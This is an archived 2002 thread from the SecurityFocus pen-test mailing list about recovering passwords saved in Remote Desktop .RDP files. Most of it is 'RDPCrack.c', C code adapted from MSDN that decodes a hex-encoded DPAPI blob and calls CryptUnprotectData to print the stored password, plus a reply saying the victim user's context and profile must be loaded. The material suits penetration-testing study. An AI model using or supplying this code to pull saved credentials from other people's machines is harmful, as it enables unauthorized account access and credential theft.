Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > pen-test > 02 > 120097.html (Request Expert securityfocus.com Support)

RE: Saved Terminal Server Sessions

From: Michael Howard <mikehow(at)microsoft.com>
Date: Tue Dec 31 2002 - 14:31:34 EST


You will also need to load the user's profile, simply impersonating may not work...

Cheers, Michael
Secure Windows Initiative
Writing Secure Code 2nd Edition
http://www.microsoft.com/mspress/books/5957.asp

-----Original Message-----
From: Nicolas RUFF [mailto:nicolas.ruff@edelweb.fr] Sent: Tuesday, December 31, 2002 2:03 AM To: pen-test

st0ff st0ff wrote:
> Hi all -
> Terminal Server Client or Remote Desktop Client are
> providing to save the appropriate user credentials. A
> plaintext file is used for that. But the password is
> encrypted in there. Is there a tool available to crack
> this?

Hi,

I guess you are talking about ".RDP" files. The password is encrypted using the CryptProtectData() standard API. You can use the code below (from MSDN), to decrypt it ; however you will have to impersonate the user somehow to make this code run, because the encryption key used is derivated from the user context (the Windows logon password I guess).

  • Nicolas RUFF
    Security Consultant @ EdelWeb nicolas.ruff@edelweb.fr 
//--------------------------------------------------------------------
// RDPCrack.c

//
// This is modified sample code from MSDN // This code requires Windows 2000 or XP // Don't forget to link CRYPT32.LIB // 
#include 
#include 
#include

void HandleError(char *s);

void main()
{
DATA_BLOB DataOut;
DATA_BLOB DataVerify;
LPWSTR pDescrOut = NULL;
BYTE *pbDataOutput;
DWORD cbDataOutput;
int data;

Do you need help?X

// Put encrypted password string here
char szEncodedPwd[] =
"01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A5C6A9949D6D804898C5037 8542C8AE40000000008000000700073007700000003660000A8000000100000008038592 82E66C6AFF273047E0D9C1D8A0000000004800000A000000010000000E60DE7216CBEC1F 108E86A1A21D7CDA1080200009878C213C72E84F0777A4D9E0B3F339906618C3F07727A7 9E1E1E923FCF50B3C5514246AD4117ADCFD4CF603AD5EEDA2A1692AFB4CAF32FEE468B6E 6C564FAADFC64E901CE784CA72081DF762B15D498F2C2488F9AAFC271B5B7D1DA2A4AA0B 585605024BCC18141213E6C9CBF3FCB1E2F032693580E63589D4342C8038E289F179147A A85B06462E35F6C2E83C29BCA2EDACC754F76A3D7DAA666EDF5D615036BAE280211B602D 3F931F7AC22C26D5B3C1E7360757FE4CBAF3D5BAD23F1F06A6572F79A81552600E7F4453 5935F3908B6642E382D19FD7072C87174EF4144FA724368827DB7ACAA412242FDC215059 5A43974FF5C3BA18CE764F46C2F783740A6C250FC5F9350A09804C0E776BFE6B9D10F60E 219FC078F02E13F90DD9730FC598EBABE4AAB75C5C64D3A51BB0CC90470AAB85A921384C 929012A60A68BC893D3AA320032836B40D43637789724C2DE79217DA3BA7E77544489049 97DAFBB308EAD210ED51FAF1F8C5ABD6B057F728AE1F836974A1D 58017821C804EB2B1DB3897F7F31247CA55377379F1B05D69F2BDEAC5BE5BFD95E754F4A 69D2301222C72AE2200200092E56C69F66E15913E13B821CA78BEA70DC8CA2F682EFE01E 69B52E6218FE5FB5FAFF0DA7E17257748F1B35F0E3507D7A13146CBDFF6155FEE6B8CEF2 F5CFF1E0D66D0B5D7C4234E07D23319BA1C6317C0CDAA9A80499DD4B57A66886A677E631 744714000000257F2ED4678E73B1D0CF2338B471F6A507A7FE9F0";

// String conversion
cbDataOutput = ( (strlen(szEncodedPwd)) / 2 ); pbDataOutput = (BYTE *)malloc( cbDataOutput + 1 ); if (pbDataOutput == NULL) HandleError("Not enough memory.");

for (unsigned int i=0; i<(cbDataOutput); i++) { 

     sscanf(&(szEncodedPwd[i+i]), "%02x", &data);
     pbDataOutput[i] = data;

}
DataOut.pbData = pbDataOutput;
DataOut.cbData = cbDataOutput;

// Decryption
if (CryptUnprotectData( 

         &DataOut,        // [in] Input data
     &pDescrOut,        // (Optional) [out] Description string
         NULL,            // (Optional) [in] Entropy (not used by MS)
         NULL,            // Reserved
         NULL,            // (Optional) PromptStruct
         0,                // Flags
         &DataVerify))    // [out] Output data
{
     wprintf(L"The decrypted data is: %s\n", (WCHAR
*)DataVerify.pbData);
     printf("The description of the data was: %S\n", pDescrOut); } else
{
     HandleError("Decryption error!");

}

LocalFree(pDescrOut);
free(DataOut.pbData);
LocalFree(DataVerify.pbData);
}

void HandleError(char *s)
{ 

     fprintf(stderr, "An error occurred in running the program. \n");
     fprintf(stderr, "%s\n",s);
     fprintf(stderr, "Error number %x.\n", GetLastError());
     fprintf(stderr, "Program terminating. \n");
     exit(1);

}

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ Received on Tue Dec 31 15:47:11 2002

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:31 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library